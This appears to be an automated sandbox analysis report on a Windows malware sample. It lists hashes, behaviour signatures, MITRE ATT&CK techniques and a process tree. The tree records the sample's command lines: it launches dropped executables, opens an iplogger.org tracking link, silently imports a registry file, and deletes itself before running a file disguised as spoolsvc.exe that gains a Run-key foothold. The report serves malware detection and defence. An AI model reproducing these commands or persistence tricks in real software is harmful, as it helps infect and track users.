Analysis

  • max time kernel
    140s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-11-2020 19:49

General

  • Target

    fed55c7266cf091330b67ef4a5d8756a.exe

  • Size

    504KB

  • MD5

    fed55c7266cf091330b67ef4a5d8756a

  • SHA1

    96f2724c024afae6a85dd67c4dd32adf240dffd5

  • SHA256

    9d50a832749b89ed5ac52dd84acf0ae6cd16196267401d1ad1cbfc8506f92bba

  • SHA512

    caad5eb4613e8316b15959f08dc6dde57d220584ad72c964bc3a7179d83ada061e3fd434e11f0b7d898ade461ef665f63c8ead4164f588927b3b9a338decdb04

Score
10/10

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ServiceHost packer 14 IoCs

    Detects ServiceHost packer used for .NET malware

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 11 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Program crash 1 IoCs
  • NSIS installer 3 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fed55c7266cf091330b67ef4a5d8756a.exe
    "C:\Users\Admin\AppData\Local\Temp\fed55c7266cf091330b67ef4a5d8756a.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      "C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\cmd.exe
        "cmd" /c start tmp1.exe & start tmp2.exe
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
          tmp1.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 1276
            5⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2304
        • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
          tmp2.exe
          4⤵
          • Executes dropped EXE
          PID:1700
    • C:\Windows\SysWOW64\regedit.exe
      "C:\Windows\System32\regedit.exe" \s C:\Windows\wotsuper.reg
      2⤵
      • Runs .reg file with regedit
      PID:884
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1lBhp.html
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2000
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2000 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1952
  • C:\Windows\system32\efsui.exe
    efsui.exe /efs /keybackup
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2068
  • C:\Windows\system32\cmd.exe
    cmd /c choice /C Y /N /D Y /T 3 & del "C:\Users\Admin\AppData\Local\Temp\tmp2.exe" & C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 3
      2⤵
      PID:2132
      • C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
        C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:2184

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence: Registry Run Keys / Startup Folder, T1060 (1)
  • Defense Evasion: Modify Registry, T1112 (2)
  • Discovery: Query Registry, T1012 (2)
  • Discovery: System Information Discovery, T1082 (1)
  • Command and Control: Web Service, T1102 (1)

Downloads

    • C:\Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      MD5

      1097a83890f4f6ba87762a98166e8091

      SHA1

      82630ccff8a0054117bd555943a77d415b866174

      SHA256

      eb6bf79c7b82421439fbe0884fde1b963a56d424f1a642e7db9e56e2792a4fc8

      SHA512

      5ba5f76b9a08b3c523052c464187410e955a49681847c1de792590095fd190137a5f7952ec4c57d67e28fca8a17ef5ebf5bfab26ebc77beaefc0749f41b2f9d1

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      54e7819a613c7bcdec3a66c867d4f1da

      SHA1

      8dbe6b6354017714de94600a5b03bea029c5f7fb

      SHA256

      99ef550a206b6c1f169bfbc2b87bc689503161821c03490480bfbe023a9af692

      SHA512

      d93021db162ac73b46d25c6e5afba9b6821a2d39e0ab577eccc7c418d18592e96a6291e5496c92cce5b74250500afba34dfca301280db39ac02d8d098154cde1

    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat
      MD5

      7e9940fdba7ec39fe8daf730e5e8d85a

      SHA1

      c5e25d613669a56a5400fc7a41b4891bbd2f33bb

      SHA256

      b3b56c78c748c66e626a19ce97454770fafa123ad104355bb97f802688a51c40

      SHA512

      b49aef1d0b278c380228244e9204b8368c936d24d57cd65d6e2f45b4bc196aef88a7b27ca2096ddae8e562a4f09acb90b7f5a1d0280aa1e5265998f559688374

    • C:\Users\Admin\AppData\Local\Microsoft\spoolsvc.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29

    • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

    • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4HNDTHPZ.txt
      MD5

      9adda8bc47b01f5e6637b4401824bbbf

      SHA1

      29dbd7b754a1730cb3cf88aa28e9ceb923613e37

      SHA256

      44da55c3cef7dd0ab4b8a2b0aaac1af216d9fe9a53000120e027d1e27ebf2595

      SHA512

      254b4d5d85d6dae2c2214c0b52805e0ab1a819a38a21a82e32afc3eec98ca1744afb5db7de2aa80c834b3a5ae8f2801e6c13781a64bc32b2733144a38719ff99

    • \Program Files (x86)\wotsuper\wotsuper\wotsuper.exe
      MD5

      1097a83890f4f6ba87762a98166e8091

      SHA1

      82630ccff8a0054117bd555943a77d415b866174

      SHA256

      eb6bf79c7b82421439fbe0884fde1b963a56d424f1a642e7db9e56e2792a4fc8

      SHA512

      5ba5f76b9a08b3c523052c464187410e955a49681847c1de792590095fd190137a5f7952ec4c57d67e28fca8a17ef5ebf5bfab26ebc77beaefc0749f41b2f9d1

    • \Users\Admin\AppData\Local\Temp\nss2C01.tmp\IRq.dll
      MD5

      293165db1e46070410b4209519e67494

      SHA1

      777b96a4f74b6c34d43a4e7c7e656757d1c97f01

      SHA256

      49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

      SHA512

      97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

    • \Users\Admin\AppData\Local\Temp\nss2C01.tmp\JBH.dll
      MD5

      44e5c77cae3ae434d1e4e619bdb1c39b

      SHA1

      9988f020eac45207d148668227b6819a38bdafa0

      SHA256

      326c406116026019a41c94b2e6b4c1061154f3bc9a395638063dae349f8a7579

      SHA512

      c3e40499d1296bebd2b1a770d9cd1f025859963a0f6dff002eb336f069f057ac4b3d2f5819232af6d2802ba1a3770f62440136030eb37355fa6f5b6ee0bc0470

    • \Users\Admin\AppData\Local\Temp\nss2C01.tmp\System.dll
      MD5

      0063d48afe5a0cdc02833145667b6641

      SHA1

      e7eb614805d183ecb1127c62decb1a6be1b4f7a8

      SHA256

      ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

      SHA512

      71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

    • \Users\Admin\AppData\Local\Temp\tmp1.exe
      MD5

      ed78b5b2e535267593966c8d20a9fadc

      SHA1

      4d88a99d92ec6192d1279b4e6f5d52b640b72e3c

      SHA256

      ce6e57d77a6a5bab02eb37d771a2b225fc8b0ad24e8382ae111f277788a528e6

      SHA512

      603bcf69dbbde6728afc50eaa43584ef4fe39f20c5b3b4f79ea9b13801b64f94855118e89ccc46dbdf50ec289d4861f3fb8921a9464188cdbb76402727b3ba4f

    • \Users\Admin\AppData\Local\Temp\tmp2.exe
      MD5

      e76739b49a4f804989d54946bc7da936

      SHA1

      67f4113a3af2561ef011cffc33146dc7cb48514d

      SHA256

      783122da15a5aaa2c6bda3b76ed0ce77d988150698b65ac0a460e207f6e623bf

      SHA512

      7ede05cb06ccf69e91d695127ef3fe2be8ccaf5f533355236caa7bd8c9f26178acf9f9fdfe8a0622ee7326341eb74b26256b2b3daf1c0c1a66135e2b8b26ce29
